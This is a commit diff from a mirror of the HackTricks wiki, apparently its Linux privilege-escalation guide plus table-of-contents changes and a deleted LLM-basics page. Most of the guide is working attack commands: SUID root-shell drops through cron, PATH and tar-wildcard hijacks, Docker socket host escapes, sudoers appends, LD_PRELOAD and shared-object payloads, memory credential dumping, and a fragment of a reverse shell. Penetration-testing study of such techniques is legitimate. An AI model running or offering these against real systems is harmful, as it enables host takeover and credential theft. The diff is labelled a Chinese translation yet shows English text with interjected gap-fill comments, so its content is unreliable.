mirror of https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00

Translated ['src/linux-hardening/privilege-escalation/README.md'] to zh

This commit is contained in:
parent 35d413ffc0
commit e28b0f90d1
@@ -793,6 +793,29 @@
- [Windows Exploiting (Basic Guide - OSCP lvl)](binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md)
- [iOS Exploiting](binary-exploitation/ios-exploiting.md)

# 🤖 AI

- [AI Security](AI/README.md)
- [AI Security Methodology](AI/AI-Deep-Learning.md)
- [AI MCP Security](AI/AI-MCP-Servers.md)
- [AI Model Data Preparation](AI/AI-Model-Data-Preparation-and-Evaluation.md)
- [AI Models RCE](AI/AI-Models-RCE.md)
- [AI Prompts](AI/AI-Prompts.md)
- [AI Risk Frameworks](AI/AI-Risk-Frameworks.md)
- [AI Supervised Learning Algorithms](AI/AI-Supervised-Learning-Algorithms.md)
- [AI Unsupervised Learning Algorithms](AI/AI-Unsupervised-Learning-algorithms.md)
- [AI Reinforcement Learning Algorithms](AI/AI-Reinforcement-Learning-Algorithms.md)
- [LLM Training](AI/AI-llm-architecture/README.md)
- [0. Basic LLM Concepts](AI/AI-llm-architecture/0.-basic-llm-concepts.md)
- [1. Tokenizing](AI/AI-llm-architecture/1.-tokenizing.md)
- [2. Data Sampling](AI/AI-llm-architecture/2.-data-sampling.md)
- [3. Token Embeddings](AI/AI-llm-architecture/3.-token-embeddings.md)
- [4. Attention Mechanisms](AI/AI-llm-architecture/4.-attention-mechanisms.md)
- [5. LLM Architecture](AI/AI-llm-architecture/5.-llm-architecture.md)
- [6. Pre-training & Loading models](AI/AI-llm-architecture/6.-pre-training-and-loading-models.md)
- [7.0. LoRA Improvements in fine-tuning](AI/AI-llm-architecture/7.0.-lora-improvements-in-fine-tuning.md)
- [7.1. Fine-Tuning for Classification](AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.md)
- [7.2. Fine-Tuning to follow instructions](AI/AI-llm-architecture/7.2.-fine-tuning-to-follow-instructions.md)

# 🔩 Reversing

- [Reversing Tools & Basic Methods](reversing/reversing-tools-basic-methods/README.md)
@@ -850,17 +873,6 @@
- [Low-Power Wide Area Network](todo/radio-hacking/low-power-wide-area-network.md)
- [Pentesting BLE - Bluetooth Low Energy](todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md)
- [Test LLMs](todo/test-llms.md)
- [LLM Training](todo/llm-training-data-preparation/README.md)
- [0. Basic LLM Concepts](todo/llm-training-data-preparation/0.-basic-llm-concepts.md)
- [1. Tokenizing](todo/llm-training-data-preparation/1.-tokenizing.md)
- [2. Data Sampling](todo/llm-training-data-preparation/2.-data-sampling.md)
- [3. Token Embeddings](todo/llm-training-data-preparation/3.-token-embeddings.md)
- [4. Attention Mechanisms](todo/llm-training-data-preparation/4.-attention-mechanisms.md)
- [5. LLM Architecture](todo/llm-training-data-preparation/5.-llm-architecture.md)
- [6. Pre-training & Loading models](todo/llm-training-data-preparation/6.-pre-training-and-loading-models.md)
- [7.0. LoRA Improvements in fine-tuning](todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md)
- [7.1. Fine-Tuning for Classification](todo/llm-training-data-preparation/7.1.-fine-tuning-for-classification.md)
- [7.2. Fine-Tuning to follow instructions](todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md)
- [Burp Suite](todo/burp-suite.md)
- [Other Web Tricks](todo/other-web-tricks.md)
- [Interesting HTTP](todo/interesting-http.md)

@@ -14,7 +14,7 @@ cat /etc/os-release 2>/dev/null # universal on modern systems
```
### Path

If you have **write permissions over any folder inside the `PATH` variable**, you may be able to hijack some libraries or binaries:
```bash
echo $PATH
```
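As a minimal sketch of such a hijack (assuming `/tmp/hijack` is a writable folder that appears in `$PATH` before the real binary's folder, and that a privileged script later runs `ls` without an absolute path — both are assumptions for illustration):
```bash
mkdir -p /tmp/hijack && cd /tmp/hijack
cat > ls <<'EOF'
#!/bin/bash
cp /bin/bash /tmp/bash && chmod +s /tmp/bash   # payload: drop a SUID shell
/bin/ls "$@"                                   # keep the expected behaviour
EOF
chmod +x ls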
@@ -33,7 +33,7 @@ uname -a
searchsploit "Linux Kernel"
```
You can find a good vulnerable kernel list and some already **compiled exploits** here: [https://github.com/lucyoa/kernel-exploits](https://github.com/lucyoa/kernel-exploits) and [exploitdb sploits](https://gitlab.com/exploit-database/exploitdb-bin-sploits).\
Other sites where you can find some **compiled exploits**: [https://github.com/bwbwbwbw/linux-exploit-binaries](https://github.com/bwbwbwbw/linux-exploit-binaries), [https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack](https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack)

To extract all the vulnerable kernel versions from that web you can do:
```bash
@@ -49,7 +49,7 @@ curl https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/README.md 2

### CVE-2016-5195 (DirtyCow)

Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
```bash
# make dirtycow stable
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
@@ -123,7 +123,7 @@ cat /proc/sys/kernel/randomize_va_space 2>/dev/null
```
## Docker Breakout

If you are inside a docker container you can try to escape from it:

{{#ref}}
docker-security/
@@ -131,7 +131,7 @@ docker-security/

## Drives

Check **what is mounted and unmounted**, where and why. If anything is unmounted you could try to mount it and check for private info.
```bash
ls /dev 2>/dev/null | grep -i "sd"
cat /etc/fstab 2>/dev/null | grep -v "^#" | grep -Pv "\W*\#" 2>/dev/null
@@ -144,11 +144,11 @@ grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc
```bash
which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null
```
Also check if **any compiler is installed**. This is useful if you need to use some kernel exploit, as it's recommended to compile it on the machine where you are going to use it (or on a similar one).
```bash
(dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; which gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/")
```
### Vulnerable Software Installed

Check the **version of the installed packages and services**. Maybe there is some old Nagios version (for example) that could be exploited for escalating privileges…\
It is recommended to check manually the version of the more suspicious installed software.
@@ -158,18 +158,18 @@ rpm -qa #Centos
```
If you have SSH access to the machine you could also use **openVAS** to check for outdated and vulnerable software installed inside the machine.

> [!NOTE] > _Note that these commands will show a lot of information that will mostly be useless, so it's recommended to use some application like OpenVAS or similar that will check if any installed software version is vulnerable to known exploits_

## Processes

Take a look at **what processes** are being executed and check if any process has **more privileges than it should** (maybe a tomcat being executed by root?)
```bash
ps aux
ps -ef
top -n 1
```
Always check for possible [**electron/cef/chromium debuggers** running; you could abuse them to escalate privileges](electron-cef-chromium-debugger-abuse.md). **Linpeas** detects those by checking the `--inspect` parameter inside the command line of the process.\
Also **check your privileges over the processes' binaries**; maybe you can overwrite one of them.

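A quick manual check along the same lines (a sketch; the exact flag a given app exposes may vary):
```bash
# Look for debug ports exposed by electron/cef/chromium/node processes
ps aux | grep -E -- '--(inspect|remote-debugging-port)' | grep -v grep
```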
### Process monitoring

@@ -215,7 +215,7 @@ done
```
#### /proc/$pid/maps & /proc/$pid/mem

For a given process ID, **maps shows how memory is mapped within that process's** virtual address space; it also shows the **permissions of each mapped region**. The **mem** pseudo file **exposes the process's memory itself**. From the **maps** file we know which **memory regions are readable** and their offsets. We use this information to **seek into the mem file and dump all readable regions** to a file.
```bash
procdump()
(
@@ -237,7 +237,7 @@ strings /dev/mem -n10 | grep -i PASS
```
### ProcDump for linux

ProcDump is a Linux reimagining of the classic ProcDump tool from the Sysinternals suite of tools for Windows. Get it at [https://github.com/Sysinternals/ProcDump-for-Linux](https://github.com/Sysinternals/ProcDump-for-Linux)
```
procdump -p 1714

@@ -290,14 +290,14 @@ strings *.dump | grep -i password

The tool [**https://github.com/huntergregal/mimipenguin**](https://github.com/huntergregal/mimipenguin) will **steal clear text credentials from memory** and from some **well known files**. It requires root privileges to work properly.

| Feature                                           | Process Name         |
| ------------------------------------------------- | -------------------- |
| GDM password (Kali Desktop, Debian Desktop)       | gdm-password         |
| Gnome Keyring (Ubuntu Desktop, ArchLinux Desktop) | gnome-keyring-daemon |
| LightDM (Ubuntu Desktop)                          | lightdm              |
| VSFTPd (Active FTP Connections)                   | vsftpd               |
| Apache2 (Active HTTP Basic Auth Sessions)         | apache2              |
| OpenSSH (Active SSH Sessions - Sudo Usage)        | sshd:                |

#### Search Regexes/[truffleproc](https://github.com/controlplaneio/truffleproc)
```bash
@@ -325,10 +325,10 @@ cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/nul

For example, inside _/etc/crontab_ you can find the PATH: _PATH=**/home/user**:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin_

(_Note how the user "user" has write permissions over /home/user_)

If inside this crontab the root user tries to execute some command or script without setting the path. For example: _\* \* \* \* root overwrite.sh_\
Then, you can get a root shell by using:
```bash
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
#Wait cron job to be executed
@@ -340,7 +340,7 @@
```bash
rsync -a *.sh rsync://host.back/src/rbd #You can create a file called "-e sh myscript.sh" so the script will execute our script
```
**If the wildcard is preceded by a path like** _**/some/path/\***_ **, it's not vulnerable (even** _**./\***_ **is not).**

Read the following page for more wildcard exploitation tricks:

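As one classic illustration before that (a hedged sketch, assuming root periodically runs something like `tar -czf /backup/backup.tgz *` inside a directory you can write to), tar's checkpoint options can be smuggled in as file names:
```bash
cd /writable/dir/being/tarred      # hypothetical target directory
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > shell.sh
touch -- '--checkpoint=1'
touch -- '--checkpoint-action=exec=sh shell.sh'
# When the wildcard expands, tar treats these file names as options
```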
@@ -356,15 +356,15 @@ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > </PATH/CRON/SCRIPT>
#Wait until it is executed
/tmp/bash -p
```
If the script executed by root uses a **directory where you have full access**, it may be useful to delete that folder and **create a symlink folder to another one** serving a script controlled by you.
```bash
ln -d -s </PATH/TO/POINT> </PATH/CREATE/FOLDER>
```
### Frequent cron jobs

You can monitor the processes to search for ones being executed every 1, 2 or 5 minutes. Maybe you can take advantage of it to escalate privileges.

For example, to **monitor every 0.1s during 1 minute**, **sort by less executed commands** and delete the commands that have been executed the most, you can do:
```bash
for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; done; sort /tmp/monprocs.tmp | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort | grep -E -v "\s*[6-9][0-9][0-9]|\s*[0-9][0-9][0-9][0-9]"; rm /tmp/monprocs.tmp;
```
@@ -372,7 +372,7 @@ for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; do

### Invisible cron jobs

It's possible to create a cron job **putting a carriage return after a comment** (without a newline character), and the cron job will still work. Example (note the carriage return char):
```bash
#This is a comment inside a cron config file\r* * * * * echo "Surprise!"
```
@@ -393,7 +393,7 @@
```bash
systemctl show-environment
```
If you find that you can **write** in any of the folders of that path you may be able to **escalate privileges**. You need to search for **relative paths being used in service configuration** files like:
```bash
ExecStart=faraday-server
ExecStart=/bin/sh -ec 'ifup --allow=hotplug %I; ifquery --state %I'
@@ -413,20 +413,20 @@ systemctl list-timers --all
```
### Writable timers

If you can modify a timer you can make it execute some instance of systemd.unit (like a `.service` or a `.target`)
```bash
Unit=backdoor.service
```
In the documentation you can read what a Unit is:

> The unit to activate when this timer elapses. The argument is a unit name, whose suffix is not ".timer". If not specified, this value defaults to a service that has the same name as the timer unit, except for the suffix. (See above.) It is recommended that the unit name that is activated and the unit name of the timer unit are named identically, except for the suffix.

Therefore, to abuse this permission you would need to:

- Find some systemd unit (like a `.service`) that is **executing a writable binary**
- Find some systemd unit that is **executing a relative path** and over which you have **writable privileges** over the **systemd PATH** (to impersonate that executable)

**Learn more about timers with `man systemd.timer`.**

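A minimal sketch of the first abuse path (hypothetical unit names; it assumes the `.timer` file itself is writable by you):
```bash
# Point a writable timer at a unit you control, then reload systemd
sed -i 's/^Unit=.*/Unit=backdoor.service/' /etc/systemd/system/vuln.timer
systemctl daemon-reload
```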
### **Enabling timers**

@@ -446,10 +446,10 @@ Unix Domain Sockets (UDS) enable communication between processes on the same or different machines in client-server models

**Learn more about sockets with `man systemd.socket`.** Inside this file, several interesting parameters can be configured:

- `ListenStream`, `ListenDatagram`, `ListenSequentialPacket`, `ListenFIFO`, `ListenSpecial`, `ListenNetlink`, `ListenMessageQueue`, `ListenUSBFunction`: These options differ, but in summary they are used to **indicate where the socket is going to listen** (the path of the AF_UNIX socket file, the IPv4/6 address and/or port number to listen on, etc.)
- `Accept`: Takes a boolean argument. If **true**, a **service instance is spawned for each incoming connection** and only the connection socket is passed to it. If **false**, all listening sockets themselves are **passed to the started service unit**, and only one service unit is spawned for all connections. This value is ignored for datagram sockets and FIFOs, where a single service unit unconditionally handles all incoming traffic. **Defaults to false**. For performance reasons, it is recommended to write new daemons only in a way that is suitable for `Accept=no`.
- `ExecStartPre`, `ExecStartPost`: Take one or more command lines, which are **executed before** or **after** the listening **sockets**/FIFOs are **created** and bound, respectively. The first token of the command line must be an absolute filename, followed by arguments for the process.
- `ExecStopPre`, `ExecStopPost`: Additional **commands** that are **executed before** or **after** the listening **sockets**/FIFOs are **closed** and removed, respectively.
- `Service`: Specifies the **service** unit name **to activate** on **incoming traffic**. This setting is only allowed for sockets with Accept=no. It defaults to the service that bears the same name as the socket (with the suffix replaced). In most cases, it should not be necessary to use this option.

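Put together, a hypothetical `.socket` unit using the directives above might look like this (illustrative names and paths, not from the original):
```
[Socket]
ListenStream=/run/example.sock
Accept=no
ExecStartPre=/usr/local/bin/prepare-socket.sh
Service=example.service
```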
### Writable .socket files

@@ -481,7 +481,7 @@ socket-command-injection.md

### HTTP sockets

Note that there may be some **sockets listening for HTTP** requests (_I'm not talking about .socket files but files acting as unix sockets_). You can check this with:
```bash
curl --max-time 2 --unix-socket /path/to/socket/file http:/index
```
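To find candidate socket files to probe in the first place, a sketch like this can help:
```bash
# List listening unix sockets and any socket-type files on disk
ss -xlp 2>/dev/null
find / -type s 2>/dev/null
```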
@@ -489,11 +489,11 @@ curl --max-time 2 --unix-socket /path/to/socket/file http:/index

### Writable Docker Socket

The Docker socket, often found at `/var/run/docker.sock`, is a critical file that should be secured. By default, it's writable by the `root` user and members of the `docker` group. Possessing write access to this socket can lead to privilege escalation. Here's a breakdown of how this can be done and alternative methods if the Docker CLI isn't available.

#### **Privilege Escalation with Docker CLI**

If you have write access to the Docker socket, you can escalate privileges using the following commands:
```bash
docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash
docker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh
@@ -532,7 +532,7 @@ Connection: Upgrade
Upgrade: tcp
```

After setting up the `socat` connection, you can execute commands directly in the container with root-level access to the host's filesystem.

### Others

@@ -564,7 +564,7 @@ runc-privilege-escalation.md

D-Bus is a sophisticated **inter-Process Communication (IPC) system** that enables applications to efficiently interact and share data. Designed with the modern Linux system in mind, it offers a robust framework for different forms of application communication.

The system is versatile, supporting basic IPC that enhances data exchange between processes, reminiscent of **enhanced UNIX domain sockets**. Moreover, it aids in broadcasting events or signals, fostering seamless integration among system components. For example, a signal from a Bluetooth daemon about an incoming call can prompt a music player to mute, enhancing user experience. Additionally, D-Bus supports a remote object system, simplifying service requests and method invocations between applications, streamlining processes that were traditionally complex.

D-Bus operates on an **allow/deny model**, managing message permissions (method calls, signal emissions, etc.) based on the cumulative effect of matching policy rules. These policies specify interactions with the bus, potentially allowing for privilege escalation through the exploitation of these permissions.

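For a quick look at what is exposed on the bus, a sketch (`busctl` ships with systemd; the service name shown is hypothetical):
```bash
busctl list                      # enumerate services on the system bus
busctl tree org.example.Service  # inspect the object tree of one service
```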
@@ -629,7 +629,7 @@ timeout 1 tcpdump

### Generic enumeration

Check **who** you are, which **privileges** you have, which **users** are in the system, which ones can **login** and which ones have **root privileges**:
```bash
#Info about me
id || (whoami && groups) 2>/dev/null
@@ -653,7 +653,7 @@ gpg --list-keys 2>/dev/null
```
### Big UID

Some Linux versions were affected by a bug that allows users with **UID > INT_MAX** to escalate privileges. More info: [here](https://gitlab.freedesktop.org/polkit/polkit/issues/74), [here](https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh) and [here](https://twitter.com/paragonsec/status/1071152249529884674).\
**Exploit it** using: **`systemd-run -t /bin/bash`**

### Groups

@@ -683,7 +683,7 @@ grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/logi
```
### Known passwords

If you **know any password** of the environment, **try to login as each user** using that password.

### Su Brute

@@ -694,11 +694,11 @@ grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/logi

### $PATH

If you find that you can **write inside some folder of the $PATH**, you may be able to escalate privileges by **creating a backdoor inside the writable folder** with the name of some command that is going to be executed by a different user (root ideally) and that is **not loaded from a folder located before** your writable folder in $PATH.

### SUDO and SUID

You could be allowed to execute some command using sudo, or some binaries could have the suid bit set. Check it using:
```bash
sudo -l #Check commands you can execute with sudo
find / -perm -4000 2>/dev/null #Find all SUID binaries
@@ -738,7 +738,7 @@ sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh
```
### Sudo execution bypassing paths

**Jump** to read other files or use **symlinks**. For example in the sudoers file: _hacker10 ALL= (root) /bin/less /var/log/\*_
```bash
sudo less /var/logs/anything
less>:e /etc/shadow #Jump to read other files using privileged less
@@ -769,7 +769,7 @@ sudo less

### SUID binary with command path

If the **suid** binary **executes another command specifying the path**, then you can try to **export a function** named like the command that the suid file is calling.

For example, if a suid binary calls _**/usr/sbin/service apache2 start**_, you have to try to create the function and export it:
```bash
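# Illustrative gap-fill (the original block is truncated at this point in the diff):
# define a function named like the absolute path the SUID binary invokes, then export it
function /usr/sbin/service() { cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p; }
export -f /usr/sbin/service
```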
@@ -787,7 +787,7 @@ export -f /usr/sbin/service

- The loader ignores **LD_PRELOAD** for executables where the real user ID (_ruid_) does not match the effective user ID (_euid_).
- For executables with suid/sgid, only libraries in standard paths that are also suid/sgid are preloaded.

Privilege escalation can occur if you have the ability to execute commands with `sudo` and the output of `sudo -l` includes the statement **env_keep+=LD_PRELOAD**. This configuration allows the **LD_PRELOAD** environment variable to persist and be recognized even when commands are run with `sudo`, potentially leading to the execution of arbitrary code with elevated privileges.
```
Defaults env_keep += LD_PRELOAD
```
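A commonly used payload for this, as a hedged sketch (file names are arbitrary; any command you are allowed to `sudo` works as the trigger):
```bash
cat > /tmp/pe.c <<'EOF'
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void _init() {
    unsetenv("LD_PRELOAD");   /* avoid re-triggering in child processes */
    setgid(0); setuid(0);
    system("/bin/bash -p");
}
EOF
gcc -fPIC -shared -nostartfiles -o /tmp/pe.so /tmp/pe.c
sudo LD_PRELOAD=/tmp/pe.so find   # "find" stands in for any sudo-allowed command
```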
@@ -840,9 +840,9 @@ sudo LD_LIBRARY_PATH=/tmp <COMMAND>
```bash
strace <SUID-BINARY> 2>&1 | grep -i -E "open|access|no such file"
```
For example, encountering an error like _"open(“/path/to/.config/libcalc.so”, O_RDONLY) = -1 ENOENT (No such file or directory)"_ suggests a potential for exploitation.

To exploit this, one would proceed by creating a C file, say _"/path/to/.config/libcalc.c"_, containing the following code:
```c
#include <stdio.h>
#include <stdlib.h>
@@ -859,7 +859,7 @@ system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
```bash
gcc -shared -o /path/to/.config/libcalc.so -fPIC /path/to/.config/libcalc.c
```
Finally, running the affected SUID binary should trigger the exploit, allowing for potential system compromise.

## Shared Object Hijacking
```bash
@@ -894,7 +894,7 @@ system("/bin/bash -p");

[**GTFOBins**](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. [**GTFOArgs**](https://gtfoargs.github.io/) is the same but for cases where you can **only inject arguments** into a command.

The project collects legitimate functions of Unix binaries that can be abused to break out of restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate other post-exploitation tasks.

> gdb -nx -ex '!sh' -ex quit\
> sudo mysql -e '! /bin/sh'\
@@ -947,7 +947,7 @@ sudo su

### /var/run/sudo/ts/\<Username>

If you have **write permissions** in that folder or on any of the files created inside it, you can use the binary [**write_sudo_token**](https://github.com/nongiach/sudo_inject/tree/master/extra_tools) to **create a sudo token for a user and PID**.\
For example, if you can overwrite the file _/var/run/sudo/ts/sampleuser_ and you have a shell as that user with PID 1234, you can **obtain sudo privileges** without needing to know the password by doing:
```bash
./write_sudo_token 1234 > /var/run/sudo/ts/sampleuser
```
@@ -959,7 +959,7 @@ sudo su
ls -l /etc/sudoers /etc/sudoers.d/
ls -ld /etc/sudoers.d/
```
If you can write, you can abuse this permission.
```bash
echo "$(whoami) ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers
echo "$(whoami) ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers.d/README
@@ -1033,7 +1033,7 @@ linux-gate.so.1 => (0x005b0000)
libc.so.6 => /var/tmp/flag15/libc.so.6 (0x00110000)
/lib/ld-linux.so.2 (0x00737000)
```
Then create an evil library in `/var/tmp` with `gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6`
```c
#include<stdlib.h>
#define SHELL "/bin/sh"
@@ -1048,8 +1048,8 @@ execve(file,argv,0);
```
## Capabilities

Linux capabilities provide a **subset of the available root privileges to a process**. This effectively breaks up root **privileges into smaller and distinctive units**. Each of these units can then be independently granted to processes. This way the full set of privileges is reduced, decreasing the risks of exploitation.\
Read the following page to **learn more about capabilities and how to abuse them**:

{{#ref}}
linux-capabilities.md
@@ -1057,14 +1057,14 @@ linux-capabilities.md

## Directory permissions

In a directory, the **bit for "execute"** implies that the affected user can "**cd**" into the folder.\
The **"read"** bit implies the user can **list** the **files**, and the **"write"** bit implies the user can **delete** and **create** new **files**.

## ACLs

Access Control Lists (ACLs) represent the secondary layer of discretionary permissions, capable of **overriding the traditional ugo/rwx permissions**. These permissions enhance control over file or directory access by allowing or denying rights to specific users who are not the owners or part of the group. This level of **granularity ensures more precise access management**. Further details can be found [**here**](https://linuxconfig.org/how-to-manage-acls-on-linux).

**Give** user "kali" read and write permissions over a file:
```bash
setfacl -m u:kali:rw file.txt
#Set it in /etc/sudoers or /etc/sudoers.d/README (if the dir is included)
@@ -1077,8 +1077,8 @@ getfacl -t -s -R -p /bin /etc /home /opt /root /sbin /usr /tmp 2>/dev/null
```
## Open shell sessions

In **old versions** you may be able to **hijack** some **shell** sessions of a different user (**root**).\
In the **newest versions** you will only be able to **connect** to screen sessions of **your own user**. However, you could find **interesting information inside the session**.

### Screen sessions hijacking

@@ -1124,7 +1124,7 @@ tmux -S /tmp/dev_sess attach -t 0 #Attach using a non-default tmux socket
### Debian OpenSSL Predictable PRNG - CVE-2008-0166

All SSL and SSH keys generated on Debian-based systems (Ubuntu, Kubuntu, etc.) between September 2006 and May 13th, 2008 may be affected by this bug.\
The bug was introduced when creating a new ssh key in those OSes, as **only 32,768 variations were possible**. This means that all the possibilities can be calculated and, **having the ssh public key, you can search for the corresponding private key**. You can find the calculated possibilities here: [https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh)

### SSH Interesting configuration values

@@ -1163,7 +1163,7 @@ ForwardAgent yes
The file `/etc/ssh_config` can **override** these **options** and allow or deny this configuration.\
The file `/etc/sshd_config` can **allow** or **deny** ssh-agent forwarding with the keyword `AllowAgentForwarding` (default is allow).

If you find that Forward Agent is configured in an environment, read the following page, as **you may be able to abuse it to escalate privileges**:

{{#ref}}
ssh-forward-agent-exploitation.md
@@ -1173,11 +1173,11 @@ ssh-forward-agent-exploitation.md

### Profiles files

The file `/etc/profile` and the files under `/etc/profile.d/` are **scripts that are executed when a user runs a new shell**. Therefore, if you can **write or modify any of them, you can escalate privileges**.
```bash
ls -l /etc/profile /etc/profile.d/
```
If any weird profile script is found, you should check it for **sensitive details**.

### Passwd/Shadow Files

@@ -1297,7 +1297,7 @@ find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/gam
aureport --tty | grep -E "su |sudo " | sed -E "s,su|sudo,${C}[1;31m&${C}[0m,g"
grep -RE 'comm="su"|comm="sudo"' /var/log* 2>/dev/null
```
In order to **read logs, the group** [**adm**](interesting-groups-linux-pe/index.html#adm-group) will be really helpful.

### Shell files
```bash
@@ -1312,7 +1312,7 @@ grep -RE 'comm="su"|comm="sudo"' /var/log* 2>/dev/null
```
### Generic Creds Search/Regex

You should also check for files containing the word "**password**" in their **name** or inside their **content**, and also check for IPs and emails inside logs, or hash regexps.\
I'm not going to list here how to do all of this, but if you are interested you can check the last checks that [**linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh) performs.

## Writable files

@@ -1329,7 +1329,7 @@ import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s

A vulnerability in `logrotate` lets users with **write permissions** on a log file or its parent directories potentially gain escalated privileges. This is because `logrotate`, often running as **root**, can be manipulated to execute arbitrary files, especially in directories like _**/etc/bash_completion.d/**_. It's important to check permissions not just in _/var/log_ but also in any directory where log rotation is applied.

> [!TIP]
> This vulnerability affects `logrotate` version `3.18.0` and older

More detailed information about the vulnerability can be found on this page: [https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition](https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition).
@@ -1344,9 +1344,9 @@

If, for whatever reason, a user is able to **write** an `ifcf-<whatever>` script to _/etc/sysconfig/network-scripts_ **or** can **adjust** an existing one, then your **system is pwned**.

Network scripts, _ifcg-eth0_ for example, are used for network connections. They look exactly like .INI files. However, they are \~sourced\~ on Linux by Network Manager (dispatcher.d).

In my case, the `NAME=` attribute in these network scripts is not handled correctly. If you have **white/blank space in the name the system tries to execute the part after the white/blank space**. This means that **everything after the first blank space is executed as root**.

For example: _/etc/sysconfig/network-scripts/ifcfg-1337_
```bash
@@ -1356,11 +1356,11 @@
DEVICE=eth0
```
### **init, init.d, systemd, and rc.d**

The directory `/etc/init.d` is home to **scripts** for **System V init (SysVinit)**, the **classic Linux service management system**. It includes scripts to `start`, `stop`, `restart`, and sometimes `reload` services. These can be executed directly or through symbolic links found in `/etc/rc?.d/`. An alternative path in Redhat systems is `/etc/rc.d/init.d`.

On the other hand, `/etc/init` is associated with **Upstart**, a newer **service management** system introduced by Ubuntu that uses configuration files for service management tasks. Despite the transition to Upstart, SysVinit scripts are still utilized alongside Upstart configurations due to a compatibility layer in Upstart.

**systemd** emerges as a modern initialization and service manager, offering advanced features such as on-demand daemon starting, automount management, and system state snapshots. It organizes files into `/usr/lib/systemd/` for distribution packages and `/etc/systemd/system/` for administrator modifications, streamlining the system administration process.

## Other Tricks

@@ -1397,7 +1397,7 @@ cisco-vmanage.md

**LinEnum**: [https://github.com/rebootuser/LinEnum](https://github.com/rebootuser/LinEnum) (-t option)\
**Enumy**: [https://github.com/luke-goddard/enumy](https://github.com/luke-goddard/enumy)\
**Unix Privesc Check:** [http://pentestmonkey.net/tools/audit/unix-privesc-check](http://pentestmonkey.net/tools/audit/unix-privesc-check)\
**Linux Priv Checker:** [www.securitysift.com/download/linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py)\
**BeeRoot:** [https://github.com/AlessandroZ/BeRoot/tree/master/Linux](https://github.com/AlessandroZ/BeRoot/tree/master/Linux)\
**Kernelpop:** Enumerate kernel vulns in Linux and MAC [https://github.com/spencerdodd/kernelpop](https://github.com/spencerdodd/kernelpop)\
@@ -1,285 +0,0 @@

# 0. Basic LLM Concepts

## Pretraining

Pretraining is the foundational phase in developing a large language model (LLM) where the model is exposed to vast and diverse amounts of text data. During this stage, **the LLM learns the fundamental structures, patterns, and nuances of language**, including grammar, vocabulary, syntax, and contextual relationships. By processing this extensive data, the model acquires a broad understanding of language and general world knowledge. This comprehensive base enables the LLM to generate coherent and contextually relevant text. Subsequently, the pretrained model can undergo fine-tuning, where it is further trained on specialized datasets to adapt its capabilities for specific tasks or domains, improving its performance and relevance in targeted applications.

## Main LLM components

An LLM is usually characterised by the configuration used to train it. These are the common components when training an LLM:

- **Parameters**: Parameters are the **learnable weights and biases** in the neural network. These are the numbers that the training process adjusts to minimize the loss function and improve the model's performance on the task. LLMs usually use millions or billions of parameters.
- **Context Length**: This is the maximum length of each sequence used to pre-train the LLM.
- **Embedding Dimension**: The size of the vector used to represent each token or word. LLMs commonly use hundreds to thousands of dimensions.
- **Hidden Dimension**: The size of the hidden layers in the neural network.
- **Number of Layers (Depth)**: How many layers the model has. LLMs usually use tens of layers.
- **Number of Attention Heads**: In transformer models, this is how many separate attention mechanisms are used in each layer. LLMs usually use tens of heads.
- **Dropout**: Dropout is roughly the percentage of data that is removed (probabilities turn to 0) during training, used to **prevent overfitting**. LLMs usually use a dropout between 0 and 20%.

Configuration of the GPT-2 model:
```json
GPT_CONFIG_124M = {
"vocab_size": 50257,  // Vocabulary size of the BPE tokenizer
"context_length": 1024, // Context length
